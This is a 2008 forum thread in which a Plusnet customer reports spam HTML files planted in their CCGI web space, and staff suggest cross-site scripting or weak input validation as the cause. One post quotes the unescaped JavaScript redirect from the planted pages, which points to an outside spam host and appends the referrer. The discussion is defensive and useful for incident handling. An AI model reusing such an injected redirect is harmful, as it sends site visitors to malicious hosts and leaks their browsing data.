CCGI Hacked ?
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page
- Plusnet Community
- :
- Forum
- :
- Help with my Plusnet services
- :
- Broadband
- :
- Re: CCGI Hacked ?
CCGI Hacked ?
17-01-2008 2:11 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
The directories the new folders and files were created in had permissions set to 755 so anyone else shouldn't really be able to upload files to them.
Whatever is placing these files on the server is putting them deep in the directory paths I had to list deep in directories to find them. I am also at a loss to know if I should leave these files on the server for inspection by F9 staff or if I should delete them.
Re: CCGI Hacked ?
17-01-2008 2:42 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Re: CCGI Hacked ?
17-01-2008 2:48 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Quote from: Marteknet The directories the new folders and files were created in had permissions set to 755 so anyone else shouldn't really be able to upload files to them.
I suspect you've fallen foul of this which can still be a problem irrespective of your permissioning.
Bob Pullen
Plusnet Product Team
If I've been helpful then please give thanks ⤵
Re: CCGI Hacked ?
17-01-2008 3:32 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
I have looked at the folder/directory structure and can not see anything that I do not recognise.
Have you any example filenames?
Re: CCGI Hacked ?
18-01-2008 12:21 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Thanks for looking Tony here are a some file names for you.
alltel-1.html
alltell.html
blackberry-1.html
bollywood-1.html
boost-1.html
boost-2.html
boost.html
boostmobile.html
cheap-1.html
cheap.html
classical.html
composer-1.html
converter-1.html
converter.html
country-1.html
cricket-2.html
free-1.html
in these html files there is escaped javascript that when unescaped shows a url redirect to
"http://noril.info/noru.php?kwa=9&dfkw=alltel&crdt=070101&said=stb07&rf=" + document.referrer;
Thanks for the Info Bob. I will be checking my websites user inputs and make sure every one of them uses some form of input validation for all potentially malicious data. I am fairly sure that this is in place but will be checking it anyway to make sure that the weekness is not in my scripts.
Moderators note by James_H : Made link unclickable
Re: CCGI Hacked ?
18-01-2008 6:30 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
It seems that I am not affected.
Have you got any further with finding out how you got this? Searching Google for bits of the unescaped address turns up nothing useful.
As you say, putting some of the filenames into Google confirms that they are ringtone related, but does not give any indication of why they should be in your ccgi area.
Re: CCGI Hacked ?
18-01-2008 9:59 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Re: CCGI Hacked ?
18-01-2008 10:06 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Also, you could delete them and see if they later appear.
If there any way with the (CHMOD) permissions that they can not be read/overwritten/modified by the perpetrators?
Re: CCGI Hacked ?
18-01-2008 10:41 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
This should protect the directories from being altered across domains. But as Bob pointed out there may be issues with web page inputs and someone may be priming an input with code that bypasses the cross domain protection. Once the script have been up loaded via the input it may be stored in a sql database or on a dynamic web page and then when called this will then execute the script on the server and hay presto because it is now essentially on the same domain it has full access. Weather the html page with the input is on one of my pages is uncertain, but to be sure I will be taking a look at all my input page routines and make sure that I have code to parse them for script content. Not a small job. I am not too sure if once someone has got access to a users ccgi web space they can access everyone’s web space on the same server but I guess it may be possible.
I have been contacted by support (24 + hours after reporting) and asked NOT to delete the files. I am still awaiting more feedback from them on this issue.
dates of the files are:
19/11/07
20/11/07
13/12/07
17/01/08
so this is an ongoing thing, I will be looking at my tracking for yesterday (17/1/08) to see if i can find out if there was any unusual traffic on any web pages i own.
I will post any relevant info here as I get it.
Re: CCGI Hacked ?
18-01-2008 2:18 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Quote from: Marteknet Not a small job. I am not too sure if once someone has got access to a users ccgi web space they can access everyone’s web space on the same server but I guess it may be possible.
No this isn't possible AFAIK (It used to be to a certain degree with the old CGI platform).
Quote I have been contacted by support (24 + hours after reporting) and asked NOT to delete the files. I am still awaiting more feedback from them on this issue.
I don't hold too much faith that we'll be able to help aside from perhaps pointing out some vulnerabilities in your scripts. Identifying the origin of the attack if it is XSS related is likely to be impossible.
Bob Pullen
Plusnet Product Team
If I've been helpful then please give thanks ⤵
Re: CCGI Hacked ?
19-01-2008 12:22 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
But all in all they were a great help. Thank Bob for the Info and the link you gave in your earlier post to this thread.
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page